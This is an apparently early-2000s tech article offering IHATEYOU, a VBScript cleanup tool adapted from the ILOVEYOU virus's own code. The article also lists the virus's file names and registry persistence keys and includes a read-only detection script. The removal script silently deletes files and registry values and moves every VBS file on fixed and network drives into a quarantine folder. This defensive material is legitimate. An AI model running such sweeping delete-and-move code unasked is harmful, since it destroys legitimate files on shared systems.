If you’re unable to get a vendor-distributed virus image to fight off the ILOVEYOU virus, here’s a quick quarantine measure that may help you contain this particularly nasty threat. Developed on the fly by TechRepublic’s own Kevin Brown, we used this tool (gratefully dubbed IHATEYOU) ourselves today to contain the spread of ILOVEYOU.
Of course, do not use this simple solution as a substitute for the vendor-distributed fixes beginning to circulate. We used it, and it worked for us, but we do not guarantee that it will work in your shop. We hope it can help you get through a crazy day, though.
In short, Kevin reversed the hacker’s VB code to identify instances of VBS files created by the virus, rename them with an IHY (IHATEYOU) extension, and then move them to the C:/Temp directory. His script also undoes the three Registry changes made by ILOVEYOU and resets the infected machine’s IE home page to blank, away from the Trojan horse page installed by ILOVEYOU.
Before you run the script, you probably want to check to see if a machine is infected by searching for these files:
- MSKernel32.vbs
- Win32DLL.vbs
- LOVE-LETTER-FOR-YOU.TXT
- WinFAT32.EXE
- WIN-BUGSFIX.EXE
- script.ini
You can run IHATEYOU on a noninfected system with limited impact. Be forewarned that any legitimate VBS files installed on the system will be renamed as IHY and moved to C:/Temp. In addition, the script conflicts with the IRC instant messaging and chat service.
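A read-only pre-check for the search step above, given here as an added example that is not part of Kevin Brown's script. It walks the same drive types IHATEYOU walks, reports files whose names begin with one of the listed names, and reports which of the Run values the script deletes are present. Prefix matching (so that LOVE-LETTER-FOR-YOU.TXT.vbs is also reported) is an assumption of this example.

```vbscript
' Added example (not part of IHATEYOU): read-only check, changes nothing.
Option Explicit
Dim fso, sh, names, runValues, hits, d, v
Set fso = CreateObject("Scripting.FileSystemObject")
Set sh = CreateObject("WScript.Shell")
hits = ""
' File names from the list above
names = Array("MSKernel32.vbs", "Win32DLL.vbs", "LOVE-LETTER-FOR-YOU.TXT", _
              "WinFAT32.EXE", "WIN-BUGSFIX.EXE", "script.ini")
' Run/RunServices values that the IHATEYOU script deletes
runValues = Array( _
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", _
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL", _
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", _
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32")

For Each d In fso.Drives
  ' Same drive types the IHATEYOU script walks (2 = fixed, 3 = network)
  If (d.DriveType = 2 Or d.DriveType = 3) And d.IsReady Then ScanFolder fso.GetFolder(d.Path & "\")
Next
For Each v In runValues
  If ValueExists(v) Then hits = hits & "REG   " & v & vbCrLf
Next
If hits = "" Then hits = "No listed files or Run values found." & vbCrLf
WScript.Echo hits

Sub ScanFolder(folder)
  Dim f, sf, n
  On Error Resume Next   ' skip folders that cannot be read
  For Each f In folder.Files
    If IsObject(f) Then  ' guard: a failed enumeration leaves f empty
      For Each n In names
        If InStr(1, f.Name, n, vbTextCompare) = 1 Then hits = hits & "FILE  " & f.Path & vbCrLf
      Next
    End If
  Next
  For Each sf In folder.SubFolders
    If IsObject(sf) Then ScanFolder sf
  Next
End Sub

Function ValueExists(path)
  On Error Resume Next   ' RegRead raises an error when the value is absent
  Err.Clear
  sh.RegRead path
  ValueExists = (Err.Number = 0)
End Function
```

Run it with cscript so the report prints to the console instead of a message box.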
To use IHATEYOU, copy the following text into a text editor and save the file with a .vbs extension or click on the IHATEYOU sidebar on the right-hand navigation bar.
IHATEYOU
rem I Hate You – removes I love you virus
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
' Opens this script's own file for reading; nothing below reads from it
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy="Undo LOVE LETTER VIRUS"
main()
sub main()
  On Error Resume Next
  dim wscr,rr
  set wscr=CreateObject("WScript.Shell")
  ' Special folders: 0 = Windows, 1 = System, 2 = Temp
  Set dirwin = fso.GetSpecialFolder(0)
  Set dirsystem = fso.GetSpecialFolder(1)
  Set dirtemp = fso.GetSpecialFolder(2)
  ' Delete the copies the virus drops in the Windows and System folders
  fso.DeleteFile dirsystem & "\MSKernel32.vbs", true
  fso.DeleteFile dirwin & "\Win32DLL.vbs", true
  fso.DeleteFile dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs", true
  fso.DeleteFile dirsystem & "\WinFAT32.EXE", true
  regruns()
  html()
  spreadtoemail()
  listadriv()
end sub
sub regruns()
  On Error Resume Next
  Dim num,downread
  ' Remove the autostart entries added by the virus
  regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32"
  regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL"
  ' The download directory is read and defaulted here but not used further
  downread=""
  downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
  if (downread="") then
    downread="c:\"
  end if
  regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX"
  regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32"
  ' Reset the IE home page to blank
  regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end sub
sub listadriv
  On Error Resume Next
  Dim d,dc
  Set dc = fso.Drives
  For Each d in dc
    ' DriveType 2 = fixed disk, 3 = network drive
    If d.DriveType = 2 or d.DriveType=3 Then
      folderlist(d.path&"\")
    end if
  Next
end sub
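sub infectfiles(folderspec)
  On Error Resume Next
  dim f,f1,fc,ext,ap,mircfname,s,bname,mp3,cop
  ' Make sure the quarantine folder exists before moving anything into it
  if not fso.FolderExists("c:\temp") then fso.CreateFolder "c:\temp"
  set f = fso.GetFolder(folderspec)
  set fc = f.Files
  for each f1 in fc
    ext=fso.GetExtensionName(f1.path)
    ext=lcase(ext)
    s=lcase(f1.name)
    if (ext="vbs") or (ext="vbe") or (s="script.ini") then
      bname=fso.GetBaseName(f1.path)
      set cop=fso.GetFile(f1.path)
      Err.Clear
      ' Files with the same base name overwrite each other in c:\temp
      cop.copy "c:\temp\" & bname & ".ihy"
      ' Delete the original only if the quarantine copy succeeded
      if Err.Number = 0 then fso.DeleteFile f1.path, true
    end if
  next
end sub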
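sub folderlist(folderspec)
  On Error Resume Next
  dim f,f1,sf
  set f = fso.GetFolder(folderspec)
  set sf = f.SubFolders
  ' Processes every subfolder recursively; files directly in
  ' folderspec itself (for example the drive root) are not scanned
  for each f1 in sf
    infectfiles(f1.path)
    folderlist(f1.path)
  next
end sub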
sub regdelete(regkey)
  Set regedit = CreateObject("WScript.Shell")
  regedit.RegDelete regkey
end sub
sub regcreate(regkey,regvalue)
  Set regedit = CreateObject("WScript.Shell")
  regedit.RegWrite regkey,regvalue
end sub
function regget(value)
  Set regedit = CreateObject("WScript.Shell")
  regget=regedit.RegRead(value)
end function
' Both helpers return 0 when the item exists and 1 when it does not
function fileexist(filespec)
  On Error Resume Next
  dim msg
  if (fso.FileExists(filespec)) Then
    msg = 0
  else
    msg = 1
  end if
  fileexist = msg
end function
function folderexist(folderspec)
  On Error Resume Next
  dim msg
  if (fso.FolderExists(folderspec)) then
    msg = 0
  else
    msg = 1
  end if
  folderexist = msg
end function
sub spreadtoemail()
  On Error Resume Next
  dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
  set regedit=CreateObject("WScript.Shell")
end sub
sub html
  On Error Resume Next
  fso.DeleteFile(dirsystem&"\LOVE-LETTER-FOR-YOU.HTM")
end sub